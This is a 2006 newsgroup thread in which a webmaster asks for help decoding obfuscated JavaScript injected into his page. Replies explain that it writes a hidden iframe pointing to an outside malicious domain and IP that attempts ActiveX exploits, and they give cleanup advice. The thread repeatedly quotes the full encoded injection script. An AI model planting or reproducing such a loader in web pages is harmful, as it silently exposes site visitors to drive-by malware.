Strange appearing javascript - hacked

[Wong Yung]

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

 

[Wong Yung]

Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

 

[Randy Webb]

Wong Yung said the following on 10/22/2006 11:04 PM:

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1> which then redirects to <URL:
http://66.36.241.243/expd/index.php> which then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

 

[Randy Webb]

Wong Yung said the following on 10/23/2006 12:55 AM:

Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.

And then it does more, see my other post.

 

[Wong Yung]

Wong Yung said the following on 10/22/2006 11:04 PM:

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1> which then redirects to <URL:
http://66.36.241.243/expd/index.php> which then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/

Thanks for the info!